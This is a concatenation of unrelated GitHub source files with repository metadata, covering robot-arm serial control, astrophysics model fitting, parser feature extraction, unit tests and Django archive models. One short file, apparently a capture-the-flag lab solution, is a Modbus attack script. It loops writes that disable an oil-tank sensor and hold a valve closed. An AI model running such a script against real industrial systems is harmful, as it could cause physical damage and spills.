ser.write(bytearray([255, 13, 42, 21, 4, 2, 0, 0, 0, 0, 0, 0, 82]))
ser.write(bytearray([255, 13, 42, 21, 5, 1, 0, 0, 0, 0, 0, 0, 82]))
ser.write(bytearray([255, 13, 42, 21, 5, 2, 0, 0, 0, 0, 0, 0, 83]))
ser.write(bytearray([255, 13, 42, 22, 0, 1, 0, 0, 0, 0, 0, 0, 78]))
ser.write(bytearray([255, 13, 42, 22, 0, 2, 0, 0, 0, 0, 0, 0, 79]))
ser.write(bytearray([255, 13, 32, 1, 0, 64, 0, 0, 0, 0, 0, 0, 110]))
ser.write(bytearray([255, 13, 11, 0, 1, 10, 0, 0, 4, 0, 0, 0, 39]))
ser.write(bytearray([255, 13, 11, 0, 2, 10, 0, 0, 4, 0, 0, 0, 40]))
ser.write(bytearray([255, 13, 11, 0, 3, 10, 0, 0, 4, 0, 0, 0, 41]))
ser.write(bytearray([255, 13, 11, 0, 4, 10, 0, 0, 4, 0, 0, 0, 42]))
ser.write(bytearray([255, 13, 11, 0, 5, 10, 0, 0, 4, 0, 0, 0, 43]))
ser.write(bytearray([255, 13, 11, 0, 6, 10, 0, 0, 0, 0, 0, 0, 40]))
ser.write(bytearray([255, 13, 11, 0, 6, 11, 0, 0, 16, 0, 0, 0, 57]))
ser.write(bytearray([255, 13, 31, 0, 0, 9, 0, 0, 0, 0, 0, 0, 53]))
ser.write(bytearray([255, 13, 31, 0, 0, 11, 0, 0, 3, 0, 0, 0, 58]))
ser.write(bytearray([255, 13, 31, 0, 0, 11, 0, 0, 3, 0, 0, 0, 58]))
ser.write(bytearray([255, 13, 31, 0, 0, 44, 0, 0, 200, 0, 0, 0, 32]))
ser.write(bytearray([255, 13, 31, 0, 0, 52, 0, 0, 0, 0, 0, 0, 96]))
ser.write(bytearray([255, 13, 31, 0, 0, 48, 0, 0, 255, 15, 0, 0, 106]))
ser.write(bytearray([255, 13, 31, 0, 0, 12, 0, 0, 255, 0, 0, 0, 55]))
#turn on torque for all joints after 5 secs:
print("turning torque on for all joints in 5 seconds...")
time.sleep(5)
ser.write(bytearray([255, 13, 21, 1, 0, 64, 0, 0, 1, 0, 0, 0, 100]))
ser.write(bytearray([255, 13, 21, 1, 1, 64, 0, 0, 1, 0, 0, 0, 101]))
ser.write(bytearray([255, 13, 21, 1, 2, 64, 0, 0, 1, 0, 0, 0, 102]))
ser.write(bytearray([255, 13, 21, 1, 3, 64, 0, 0, 1, 0, 0, 0, 103]))
ser.write(bytearray([255, 13, 21, 1, 4, 64, 0, 0, 1, 0, 0, 0, 104]))
ser.write(bytearray([255, 13, 21, 1, 5, 64, 0, 0, 1, 0, 0, 0, 105]))
print("torque is on.")
for joint in range(1,6):
if joint == 2:
ser.write(bytearray([255, 13, 21, 1, joint, 112, 0, 0, 208, 7, 0, 0, 106+joint]))
ser.write(bytearray([255, 13, 21, 1, joint, 108, 0, 0, 232, 3, 0, 0, 122+joint]))
ser.write(bytearray([255, 13, 51, 20, joint, 0, 0, 0, 255, 255, 252, 124, (84+joint+255+255+252+124)%256]))
else:
ser.write(bytearray([255, 13, 21, 1, joint, 112, 0, 0, 208, 7, 0, 0, 106+joint]))
ser.write(bytearray([255, 13, 21, 1, joint, 108, 0, 0, 232, 3, 0, 0, 122+joint]))
ser.write(bytearray([255, 13, 51, 20, joint, 0, 0, 0, 0, 0, 0, 0, (84+joint)%256]))
time.sleep(3)
def send(shoulder, elbow, forearm, wrist, hand):
global ser
speedbytes = (0).to_bytes(4, byteorder='little', signed=True)
accelbytes = (0).to_bytes(4, byteorder='little', signed=True)
shoulder = int(max(-60, min(60, shoulder)))
elbow = int(max(-45, min(90, elbow)))
forearm = int(max(0, min(180, forearm)))
wrist = int(max(-90, min(90, wrist)))
hand = int(max(-90, min(90, hand)))
#accelbytes = (0).to_bytes(4, byteorder='little', signed=True)
for joint in range(1, 5):
ser.write(bytearray([255, 13, 21, 1, joint, 112, 0, 0, speedbytes[0], speedbytes[1], speedbytes[2], speedbytes[3], (147+joint+speedbytes[0]+speedbytes[1]+speedbytes[2]+speedbytes[3])%256]))
ser.write(bytearray([255, 13, 21, 1, joint, 108, 0, 0, accelbytes[0], accelbytes[1], accelbytes[2], accelbytes[3], (143+joint+accelbytes[0]+accelbytes[1]+accelbytes[2]+accelbytes[3])%256]))
if joint == 0:
angle = int((shoulder-45)*10)
elif joint == 1:
angle = int(elbow*-10)
elif joint == 2:
angle = int((forearm-90)*10)
elif joint == 3:
angle = int(wrist*10)
elif joint == 4:
angle = int(hand*10)
anglebytes = (angle).to_bytes(4, byteorder='little', signed=True)
ser.write(bytearray([255, 13, 51, 20, joint, 0, 0, 0, anglebytes[0], anglebytes[1], anglebytes[2], anglebytes[3], (84+joint+anglebytes[0]+anglebytes[1]+anglebytes[2]+anglebytes[3])%256]))
#print("commands sent.")
#while evt or (o.isOpen() and o.property("initialized")):
def animate(i):
global evt
global lastmarkers
#print(lastmarkers)
#t1 = time.time()
ax.cla()
ax.axes.set_xlim3d(left=-2000, right=2000)
ax.axes.set_ylim3d(bottom=-2000, top=2000)
ax.axes.set_zlim3d(bottom=-2000, top=2000)
ax.set_autoscale_on(False)
ax.scatter(0,0,0)
ax.text(0,0,0,"(0, 0, 0)")
# poll for events with a timeout (microseconds)
getLatestEvent()
# nothing received, keep waiting
if not evt:
return
# process event
if evt.type_id == owl.Type.FRAME:
# print markers
if "markers" in evt:
#good = True
count = 0
for m in evt.markers:
ax.scatter(m.x, m.y, m.z)
if not (m.x == 0 or m.y == 0 or m.z == 0):
lastmarkers[count][0] = m.x
lastmarkers[count][1] = m.y
lastmarkers[count][2] = m.z
#print(str(m.x) + ", " + str(m.y) + ", " + str(m.z))
count += 1
if [0,0,0] not in lastmarkers:
angles = calculateangles(lastmarkers)
ax.text(-1500,0,0,f"Shoulder Rotated ≈ {angles[1]}°\nShoulder Tilted ≈ {angles[0]}°\nElbow Tilted ≈ {angles[2]}°\nWrist Tilted ≈ {angles[3]}°\nWrist Rotated ≈ {angles[4]}°")
#if i % 2 == 0:
#for joint in range(0, 5):
#if abs(angles[joint] - oldangles[joint]) > 1000:
#good = False
#if good or i == 1:
send(angles[1], angles[0], angles[2], angles[3], angles[4])
#oldangles = angles
elif evt.type_id == owl.Type.ERROR:
# handle errors
print(evt.name, evt.data)
if evt.name == "fatal":
return
elif evt.name == "done":
# done event is sent when master connection stops session
print("done")
return
#t2 = time.time()
#print(f"Completed 1 iteration in {t2 - t1} seconds.")
ani = anim.FuncAnimation(fig, animate, interval=0)
'''
cont = input("Enter any text to close server & untorque servoes.")
if cont:
o.done()
o.close()
print("torque off in 3 seconds...")
time.sleep(3)
ser.write(bytearray([255, 13, 21, 1, 0, 64, 0, 0, 0, 0, 0, 0, 99]))
ser.write(bytearray([255, 13, 21, 1, 1, 64, 0, 0, 0, 0, 0, 0, 100]))
ser.write(bytearray([255, 13, 21, 1, 2, 64, 0, 0, 0, 0, 0, 0, 101]))
ser.write(bytearray([255, 13, 21, 1, 3, 64, 0, 0, 0, 0, 0, 0, 102]))
ser.write(bytearray([255, 13, 21, 1, 4, 64, 0, 0, 0, 0, 0, 0, 103]))
ser.write(bytearray([255, 13, 21, 1, 5, 64, 0, 0, 0, 0, 0, 0, 104]))
ser.close()
'''
#result_available.wait(0.020)
# end main loop
# end session
#o.done()
# close socket
#o.close()
|
[
"noreply@github.com"
] |
jonathanzxu.noreply@github.com
|
689b7417c6d3e9da284d1cd85628ac8fba391625
|
f03bd5bd7873c5cc33b4ef5199f219539f3a340e
|
/CAAPR/CAAPR_AstroMagic/PTS/pts/modeling/fitting/modelgenerators/initial.py
|
5f85234c172d0a8fa170625b8c8bc5f8810e3bf3
|
[
"GPL-1.0-or-later",
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-philippe-de-muyter",
"MIT"
] |
permissive
|
Stargrazer82301/CAAPR
|
5f8a7033b16792f23abd5d07021b53b9228a5db4
|
62b2339beb2eb956565e1605d44d92f934361ad7
|
refs/heads/master
| 2022-08-29T02:53:33.658022
| 2022-08-05T19:06:46
| 2022-08-05T19:06:46
| 49,977,601
| 8
| 1
|
MIT
| 2022-08-05T19:06:47
| 2016-01-19T19:32:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,272
|
py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.modeling.fitting.modelgenerators.initial Contains the InitialModelGenerator class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ....core.tools.logging import log
from ....evolve.engine import GAEngine, RawScoreCriteria
from ....evolve.genomes.list1d import G1DList
from ....evolve import mutators
from ....evolve import initializators
from ....evolve import constants
from .generator import ModelGenerator
from ....core.tools.random import save_state
# -----------------------------------------------------------------
class InitialModelGenerator(ModelGenerator):
"""
This class...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(InitialModelGenerator, self).__init__()
# The genetic algorithm engine
self.engine = None
# -----------------------------------------------------------------
def setup(self):
"""
This function ...
:return:
"""
# Call the setup function of the base class
super(InitialModelGenerator, self).setup()
# Create the first genome
genome = G1DList(self.nparameters)
# Set genome options
genome.setParams(minima=self.parameter_minima, maxima=self.parameter_maxima, bestrawscore=0.00, rounddecimal=2)
genome.initializator.set(initializators.HeterogeneousListInitializerReal)
# genome.mutator.set(mutators.HeterogeneousListMutatorRealRange)
genome.mutator.set(mutators.HeterogeneousListMutatorRealGaussian)
# Create the genetic algorithm engine
self.engine = GAEngine(genome)
# Set options for the engine
self.engine.terminationCriteria.set(RawScoreCriteria)
self.engine.setMinimax(constants.minimaxType["minimize"])
self.engine.setGenerations(5)
self.engine.setCrossoverRate(0.5)
self.engine.setPopulationSize(100)
self.engine.setMutationRate(0.5)
# Initialize the genetic algorithm
self.engine.initialize()
# -----------------------------------------------------------------
def generate(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Generating the initial population of models ...")
# Get the initial population
population = self.engine.get_population()
# Loop over the individuals of the population
parameter_names = self.parameter_names
for individual in population:
# Loop over all the genes (parameters)
for i in range(len(individual)):
# Get the parameter value
value = individual[i]
# Add the parameter value to the dictionary
self.parameters[parameter_names[i]].append(value)
# -----------------------------------------------------------------
def write(self):
"""
This function ...
:return:
"""
# Write the genetic algorithm engine
self.write_engine()
# Write the state of the random number generator
self.write_prng()
# -----------------------------------------------------------------
def write_engine(self):
"""
This function ...
:return:
"""
# Save the genetic algorithm
self.engine.saveto(path)
# -----------------------------------------------------------------
def write_prng(self):
"""
This function ...
:return:
"""
# Save the state of the random generator
save_state(random_path)
# -----------------------------------------------------------------
|
[
"cjrc88@gmail.com"
] |
cjrc88@gmail.com
|
2406d9af34f7c194e5dd1d3f09c112f9e766f4de
|
b25489128f5f3ab049822b449d155d6d33c3a6ba
|
/extract_features.py
|
3fa6efe58e3975ee114e003e030e8eb41cafa350
|
[] |
no_license
|
ssutee/naist-parser
|
9a7e115140b9ea05deddfa865e3d97a26931abba
|
8febb14f482cf6fdc159ed5b603daad4f37e0700
|
refs/heads/master
| 2020-04-04T17:25:03.502787
| 2012-11-02T19:29:16
| 2012-11-02T19:29:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,738
|
py
|
#!/usr/bin/python2.5
import sys,os,re
#sstc_parser_path = os.path.join(os.path.dirname(sys.argv[0]), os.pardir, 'sstc_parser')
#sys.path.insert(0, os.path.abspath(sstc_parser_path))
#import sstc_parser
import xml.etree.ElementTree as ET
from naist_parser.maxent_utils import generate_features,create_between_pos_table,extract_features
from naist_parser.common_utils import decode_punc,encode_number,get_simplified_pos
def load_pos(pos_file):
ptable = {}
for line in open(pos_file).readlines():
tokens = line.split()
word,pos = [],[]
for token in tokens:
if re.match('\w+',token):
pos.append(token)
else:
word.append(token)
if ' '.join(word) not in ptable:
ptable[' '.join(word)] = set(pos)
else:
ptable[' '.join(word)] |= set(pos)
return ptable
def get_pos_features(ptable,word):
pos = []
if word in ptable:
pos = ptable[word]
return ' '.join(map(lambda x: str(x in pos), all_pos))
def get_simplified_pos_features(ptable,word):
pos = []
if word in ptable:
pos = ptable[word]
sim_pos = map(get_simplified_pos,pos)
return ' '.join(map(lambda x: str(x in sim_pos), all_simplified_pos))
def is_content_word(pos):
if pos in Noun+Verb+Adjective+Adverb: return 'True'
return 'False'
def extract_training_features(e,child,itable):
if e == 'U-HEAD':
pword,ppos,pspos = 'U-HEAD','U-HEAD','U-HEAD'
psnode = -1
piscon = False
else:
pword = e.get('word').replace(' ','_')
ppos = e.get('pos')
psnode = map(int,e.get('snode').split('_'))
pspos = get_simplified_pos(ppos)
piscon = is_content_word(ppos)
cword = child.get('word').replace(' ','_')
cpos = child.get('pos')
csnode = map(int,child.get('snode').split('_'))
cspos = get_simplified_pos(cpos)
ciscon = is_content_word(cpos)
skip = str(abs(psnode[1]-csnode[0]))
loc = 'R'
if psnode[0] > csnode[0]:
loc = 'L'
if psnode > -1:
i = itable.index([psnode[0],psnode[1],pword,ppos])
if i == 0: # starting node
ppword,pppos = '-S-','-S-'
elif i == len(itable)-1: # ending node
npword,nppos = '-E-','-E-'
if i != 0:
x,x,ppword,pppos = itable[i-1]
if i != len(itable)-1:
x,x,npword,nppos = itable[i+1]
else:
ppword,pppos,npword,nppos = 'U-HEAD','U-HEAD','U-HEAD','U-HEAD'
j = itable.index([csnode[0],csnode[1],cword,cpos])
if j == 0: # starting node
pcword,pcpos = '-S-','-S-'
elif j == len(itable)-1: # ending node
ncword,ncpos = '-E-','-E-'
if j != 0:
x,x,pcword,pcpos = itable[j-1]
if j != len(itable)-1:
x,x,ncword,ncpos = itable[j+1]
features = generate_features(pword,ppos,cword,cpos,ppword,pppos,npword,nppos,pcword,pcpos,ncword,ncpos,loc,skip)
return features
def filter_blank(etree):
if etree.getchildren() == []:
if etree.get('word') == None:
return ET.Element('node')
if etree.get('word') == '_':
return None
word = etree.get('word')
pos = etree.get('pos')
snode = etree.get('snode')
stree = etree.get('stree')
node = ET.Element('node')
node.set('word',word)
node.set('pos',pos)
node.set('snode',snode)
node.set('stree',stree)
return node
node = ET.Element('node')
word = etree.get('word')
pos = etree.get('pos')
snode = etree.get('snode')
stree = etree.get('stree')
node = ET.Element('node')
node.set('word',word)
node.set('pos',pos)
node.set('snode',snode)
node.set('stree',stree)
for child in etree.getchildren():
subnode = filter_blank(child)
if subnode != None:
node.append(subnode)
return node
def delete_blank(etree,text):
# find position of blank word
mark = []
for i,word in enumerate(text.split()):
if word == '_':
mark.append(i)
# recompute snode in etree
blank_node = []
for node in etree.getiterator():
if node.get('snode') != None:
x,y = map(int,node.get('snode').split('_'))
for m in mark:
if x > m:
x-=1
node.set('snode','%d_%d'%(x,x+1))
if node.get('word') == '_':
blank_node.append(node)
# remove blank word from etree
etree = filter_blank(etree.getroot())
etree = ET.ElementTree(etree)
# recompute stree
for node in etree.getiterator():
if node.get('stree') == None: continue
tmp = []
for child in node.getiterator():
x,y = map(int,child.get('snode').split('_'))
tmp.append(x)
tmp.append(y)
node.set('stree','%d_%d'%(min(tmp),max(tmp)))
return etree
def recompute_itable(itable,text):
# find position of blank word
mark = []
for i,word in enumerate(text.split()):
if word == '_':
mark.append(i)
# recompute snode in itable
tmp = []
for i,(x,y,w,p) in enumerate(itable):
for m in mark:
if x > m:
x-=1
itable[i][0] = x
itable[i][1] = x+1
if w == '_':
tmp.append(itable[i])
# remove blank word from itable
for t in tmp:
itable.remove(t)
return itable
def print_tree(tree,s):
if tree.getchildren() == []:
return '%s/%s'%(tree.get('word'),tree.get('pos'))
s = '%s/%s'%(tree.get('word'),tree.get('pos'))
s += '( '
for child in tree.getchildren():
s += print_tree(child,s) + ','
s = s.strip(',') + ' )'
return s
#def gen_events(sstc,text):
# parser = sstc_parser.SSTCParser()
# etree = parser.parse(sstc,text)
#
# etree = delete_blank(etree,text)
# parser.itable = recompute_itable(parser.itable,text)
# text = text.replace('_','')
# positive = []
# for e in etree.getiterator():
# if e.get('word') == None: continue
# children = e.getchildren()
# if children != []:
# for child in children:
# positive.append(extract_training_features(e,child,parser.itable))
# negative = []
# for e1 in etree.getiterator():
# for e2 in etree.getiterator():
# if e1.get('word') == None or e2.get('word') == None: continue
# if e1 != e2:
# f = extract_training_features(e1,e2,parser.itable)
# if f not in positive:
# negative.append(f)
#
# pe = '\n'.join(map(lambda x:'Yes '+x,positive)).strip()
# ne = '\n'.join(map(lambda x:'No '+x,negative)).strip()
#
# return pe,ne
'''
def gen_events(sstc,text):
parser = sstc_parser.SSTCParser()
etree = parser.parse(sstc,text)
positive = []
negative = []
for e in etree.getiterator():
if e.get('word') == None: continue
children = e.getchildren()
if children != []:
for child in children:
positive.append(extract_training_features(e,child,parser.itable))
negative.append(extract_training_features(child,e,parser.itable))
pe = '\n'.join(map(lambda x:'Yes '+x,positive)).strip()
ne = '\n'.join(map(lambda x:'No '+x,negative)).strip()
return pe,ne
'''
def main_old():
lines = sys.__stdin__.readlines()
train_file = open('train.data','w')
ne_test_file = open('ne_test.data','w')
pe_test_file = open('pe_test.data','w')
all_test_file = open('all_test.data','w')
total_file = open('total.data','w')
i = 0
for line in lines:
if line.find('St:') == 0:
sstc = line[3:].strip()
if line.find('Ss:') == 0:
# try:
text = line[3:].strip()
pe,ne = gen_events(sstc,text)
i += 1
total_file.write(pe+'\n')
total_file.write(ne+'\n')
if i%10 == 0:
pe_test_file.write(pe+'\n')
ne_test_file.write(ne+'\n')
all_test_file.write(pe+'\n'+ne+'\n')
else:
train_file.write(pe+'\n')
train_file.write(ne+'\n')
# except AttributeError,e:
# print e
# pass
train_file.close()
pe_test_file.close()
ne_test_file.close()
all_test_file.close()
total_file.close()
def main():
lines = sys.__stdin__.readlines()
tmp = []
for line in lines:
if line.strip() != '':
tmp.append(line.strip())
else:
W = ['<root>'] + map(encode_number,map(str.strip,tmp[0].split('\t')))
T = ['<root-POS>'] + map(str.strip,tmp[1].split('\t'))
H = [-1] + map(str.strip,tmp[-1].split('\t'))
if len(W) < 2:
continue
nW = []
for i in range(len(W)):
if T[i] == 'npn':
nW.append('<npn>')
else:
nW.append(W[i])
W = nW
units = [(W[i].replace(' ','_'),T[i],H[i]) for i in range(len(W))]
pairs = [(int(h),i) for i,h in enumerate(H)]
b_table = create_between_pos_table(T)
for i in range(len(W)):
for j in range(i+1,len(W),1):
for di in ['L','R']:
ans = 'No'
if (di == 'L' and (j,i) in pairs) or (di == 'R' and (i,j) in pairs):
ans = 'Yes'
print ans,extract_features(i,j,di,units,b_table)
tmp = []
if __name__ == '__main__':
main()
|
[
"sutee.s@gmail.com"
] |
sutee.s@gmail.com
|
0ebb921c93ea58f0e08f06055eee26fd99f1b460
|
754772a0854759f6e23c3df05902c8b5954cf1da
|
/tests/test_misc.py
|
08123ce218318574bed13e76a81478db9dbcc493
|
[
"BSD-3-Clause"
] |
permissive
|
jmosbacher/straxen
|
8d5bd0d62d547ce7fa2bd61e0ae9b92b5c9446c2
|
ffcf06ad86471caf11cc831f2ff68d70b59464af
|
refs/heads/master
| 2022-11-03T03:06:08.159677
| 2022-03-17T09:39:58
| 2022-03-17T09:39:58
| 240,460,464
| 0
| 0
|
BSD-3-Clause
| 2020-02-14T08:21:55
| 2020-02-14T08:21:54
| null |
UTF-8
|
Python
| false
| false
| 2,356
|
py
|
from straxen.misc import TimeWidgets, print_versions
import straxen
import unittest
def test_widgets():
tw = TimeWidgets()
wig = tw.create_widgets()
start, end = tw.get_start_end()
assert isinstance(start, int) and isinstance(end, int), "Should have returned unix time in ns as integer!"
assert end > start, "By default end should be larger than start"
# Now manually change time zone and compare:
wig.children[0].children[0].value = 1
start_utc, end_utc = tw.get_start_end()
h_in_ns_unix = 60*60*10**9
assert (start_utc - start == h_in_ns_unix
or start_utc - start == 2 * h_in_ns_unix
or start_utc - start == 0 * h_in_ns_unix)
assert (start_utc - end == h_in_ns_unix
or start_utc - end == 2 * h_in_ns_unix
or start_utc - end == 0 * h_in_ns_unix)
def test_change_in_fields():
tw = TimeWidgets()
wig = tw.create_widgets()
start, end = tw.get_start_end()
# Modify the nano-second value:
wig.children[1].children[2].value = '20'
wig.children[2].children[2].value = '20'
start20, end20 = tw.get_start_end()
assert start20 - start == 20, 'Start nano-second field did not update.'
assert end20 - end == 20, 'End nano-second field did not update.'
# Modify Minutes:
time = wig.children[1].children[1].value
minutes = int(time[-2:])
minutes *= 60*10**9
wig.children[1].children[1].value = time[:-2] + '00' # .value is a string "HH:MM"
start00, _ = tw.get_start_end()
assert start20 - start00 == minutes, 'Time field did not update its value!'
def test_print_versions(modules=('numpy', 'straxen', 'non_existing_module')):
for return_string in [True, False]:
for include_git in [True, False]:
res = print_versions(modules,
return_string=return_string,
include_git=include_git)
if return_string:
assert res is not None
class HitAmplitude(unittest.TestCase):
def test_non_existing(self):
with self.assertRaises(ValueError):
straxen.hit_min_amplitude('non existing key')
@staticmethod
def test_get_hit_amplitude():
straxen.hit_min_amplitude('pmt_commissioning_initial')
straxen.hit_min_amplitude('pmt_commissioning_initial_he')
|
[
"noreply@github.com"
] |
jmosbacher.noreply@github.com
|
42bff62307ce3d225abc5165888a0afa1c81c20f
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_337/ch168_2020_06_21_16_37_43_552715.py
|
c908bf4827594b2f54867234292d854591578d23
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
def login_disponivel(login, lista):
if not login in lista:
return login
else:
i = 1
while True:
login2 = login+str(i)
if not login2 in lista:
return login2
i+=1
|
[
"you@example.com"
] |
you@example.com
|
94f45669243390528d13a80da5a3eea3cc91fd1b
|
e3170e1efe723d8fa0092445167e9f77d60faf83
|
/THM_Attacking_ICS_Plant2_exploit_flag1.py
|
9334b7a9b44f9d7cade98f4545340828b4f34c29
|
[] |
no_license
|
Pri3st/Exploit-Scripts
|
18dad047342ec5b97c98b9827842a5878addd925
|
311a1c606c77aa479bf7a7641b8635bea7537a6c
|
refs/heads/main
| 2023-03-26T05:30:06.610217
| 2021-03-23T08:41:07
| 2021-03-23T08:41:07
| 304,022,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 420
|
py
|
#!/usr/bin/env python3
import sys
import time
from pymodbus.client.sync import ModbusTcpClient as ModbusClient
from pymodbus.exceptions import ConnectionException
ip = sys.argv[1]
client = ModbusClient(ip, port=502)
client.connect()
while True:
client.write_register(1, 1) # Keep the flow open
client.write_register(2, 0) # Disable oil tank sensor
client.write_register(3, 0) # Keep the oil tank valve closed
|
[
"noreply@github.com"
] |
Pri3st.noreply@github.com
|
1ea40e6f89b43f374cb8c40d8ed087f373e505a9
|
d5b6fe924aa18628ece256950680615a23c01f63
|
/src/ripa_archive/documents/models.py
|
ea7c62908acca488841d20de25bbf127fcfc5617
|
[] |
no_license
|
sysint64/ripa_archive
|
ba7c518d534eb5061b4ce42cb53f1c05fa207441
|
c9a7340c68efca44220a234781e250ec6b79209f
|
refs/heads/master
| 2021-05-15T03:33:38.364342
| 2018-05-14T16:48:26
| 2018-05-14T16:48:26
| 107,300,580
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,168
|
py
|
import os
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from ripa_archive.accounts.models import User
from ripa_archive.documents.validators import NAME_MAX_LENGTH
from ripa_archive.permissions import codes
from ripa_archive.permissions.models_abstract import ModelCustomPermission, ModelWhichHaveCustomPermissionsMixin
class FoldersManager(models.Manager):
ALREADY_EXIST_ERROR = _('Folder with name "%s" already exist in this folder')
def get_by_path(self, path):
parent_folder = self.filter(name="Root", parent=None).first()
if path is None:
return parent_folder
folders_names = path.split("/")
for folder_name in folders_names:
parent_folder = self.filter(name=folder_name, parent=parent_folder).first()
if parent_folder is None:
return None
return parent_folder
def exist_with_name(self, parent, name, instance=None):
qs = self.get_queryset().filter(parent=parent, name__iexact=name)
if instance is not None:
qs = qs.exclude(pk=instance.pk)
return qs.count() > 0
def for_user(self, user, folder=None):
queryset = self.get_queryset()
if user is None or user.group is None:
return queryset.none()
if folder is not None:
if not folder.is_user_has_permission(user, codes.FOLDERS_CAN_READ):
return queryset.none()
return queryset.filter(parent=folder)
else:
if not user.group.has_permission(codes.FOLDERS_CAN_READ):
return queryset.none()
return queryset
class DocumentsManager(models.Manager):
ALREADY_EXIST_ERROR = _('Document with name "%s" already exist in this folder')
def exist_with_name(self, parent, name, instance=None):
qs = self.get_queryset().filter(parent=parent, name__iexact=name)
if instance is not None:
qs = qs.exclude(pk=instance.pk)
return qs.count() > 0
def for_user(self, user, folder=None):
queryset = self.get_queryset()
if user is None or user.group is None:
return queryset.none()
if folder is not None:
if not folder.is_user_has_permission(user, codes.FOLDERS_CAN_READ):
return queryset.none()
return queryset.filter(parent=folder)
else:
if not user.group.has_permission(codes.DOCUMENTS_CAN_READ):
return queryset.none()
return queryset
class FolderCustomPermission(ModelCustomPermission):
for_instance = models.ForeignKey("Folder")
class DocumentCustomPermission(ModelCustomPermission):
for_instance = models.ForeignKey("Document")
# Default folders: root and none
class Folder(ModelWhichHaveCustomPermissionsMixin, models.Model):
class Meta:
default_related_name = "folders"
content_type = "documents.Folder"
custom_permission_model = FolderCustomPermission
parent = models.ForeignKey('Folder', null=True, blank=True)
name = models.CharField(verbose_name=_("Name"), max_length=NAME_MAX_LENGTH)
objects = FoldersManager()
@property
def permalink(self):
if self.path != "":
return reverse("documents:index", kwargs={"path": self.path})
else:
return reverse("documents:index")
@property
def archive_permalink(self):
if self.path != "":
return reverse("documents:archive", kwargs={"path": self.path})
else:
return reverse("documents:archive")
@property
def path_folders(self):
items = [self]
current_folder = self.parent
while current_folder is not None:
items = [current_folder] + items
current_folder = current_folder.parent
print(current_folder)
return items
@property
def path(self):
folders = self.path_folders
# Remove root folder
if len(folders) >= 1 and folders[0].parent is None and folders[0].name == "Root":
folders = folders[1:]
return "/".join([str(folder) for folder in folders])
@property
def breadcrumbs(self):
items = []
for folder in self.path_folders:
items.append({"name": folder.name, "permalink": folder.permalink})
return items
@property
def archive_breadcrumbs(self):
items = []
for folder in self.path_folders:
items.append({"name": folder.name, "permalink": folder.archive_permalink})
return items
def __str__(self):
return self.name
class Document(ModelWhichHaveCustomPermissionsMixin, models.Model):
class Meta:
default_related_name = "documents"
class Status:
OPEN = "0"
IN_PROGRESS = "1"
PROJECT = "2"
FINAL = "3"
CLOSE = "4"
FORM_CHOICES = (
(OPEN, _("Open")),
# (IN_PROGRESS, "In progress"),
(PROJECT, _("Project")),
(FINAL, _("Final")),
(CLOSE, _("Close")),
)
ALL_CHOICES = (
(OPEN, _("Open")),
(IN_PROGRESS, _("In progress")),
(PROJECT, _("Project")),
(FINAL, _("Final")),
(CLOSE, _("Close")),
)
content_type = "documents.Document"
custom_permission_model = DocumentCustomPermission
name = models.CharField(max_length=NAME_MAX_LENGTH, default="No name")
owner = models.ForeignKey(User, null=True, related_name="owner")
contributors = models.ManyToManyField(User, related_name="contributors")
followers = models.ManyToManyField(User, related_name="followers")
data = models.OneToOneField("DocumentData", null=True, default=None)
current_edit_meta = models.ForeignKey("DocumentEditMeta", null=True, default=None)
accepted_edit_meta = models.ForeignKey("DocumentEditMeta", null=True, default=None, related_name="accepted_edit_meta")
parent = models.ForeignKey(Folder)
status = models.CharField(verbose_name=_("Status"), max_length=2, default=Status.OPEN, choices=Status.FORM_CHOICES)
objects = DocumentsManager()
def _reverse(self, urlname, kwargs=None):
if self.data is None:
return ""
if kwargs is None:
kwargs = {}
if self.parent.path != "":
kwargs.update({"path": self.parent.path, "name": self.name})
else:
kwargs.update({"name": self.name})
return reverse("documents:" + urlname, kwargs=kwargs)
@property
def status_str(self):
return dict(Document.Status.ALL_CHOICES).get(self.status, "Undefined")
@property
def permalink(self):
return self._reverse("document")
@property
def last_version_file_permalink(self):
return self._reverse("last-version-file")
@property
def upload_new_version_permalink(self):
return self._reverse("upload-new-version")
def data_permalink(self, data):
return self._reverse("get-file", kwargs={"version": data.pk})
@property
def last_data(self):
return DocumentData.objects.filter(document=self).order_by("-datetime").last()
@property
def path(self):
if self.parent.path != "":
return self.parent.path + "/" + self.name
else:
return self.name
@property
def is_under_edition(self):
return self.current_edit_meta is not None
def __str__(self):
return self.name
class DocumentType:
FILE = "0"
TEXT = "1"
WORD = "2"
PDF = "3"
SOUND = "4"
EXCEL = "5"
ARCHIVE = "6"
IMAGE = "7"
VIDEO = "8"
POWERPOINT = "9"
EXTENSIONS = (
(TEXT, ("txt",)),
(PDF, ("pdf",)),
(SOUND, ("mp3", "wav", "flac", "acc",)),
(ARCHIVE, ("7z", "zip", "rar", "tar", "gz",)),
(IMAGE, ("jpg", "jpeg", "png",)),
(VIDEO, ("avi", "mp4", "mpeg4", "3gp",)),
(WORD, ("doc", "docx",)),
(EXCEL, ("xls", "xlsx", "xlsb",)),
(POWERPOINT, ("ppt", "pptx",)),
)
@staticmethod
def get_type_from_name(name):
_, ext = os.path.splitext(name)
ext = ext[1:]
for type_extensions_pair in DocumentType.EXTENSIONS:
document_type, extensions = type_extensions_pair
if ext in extensions:
return document_type
return DocumentType.FILE
class DocumentData(models.Model):
class Meta:
default_related_name = "document_data_set"
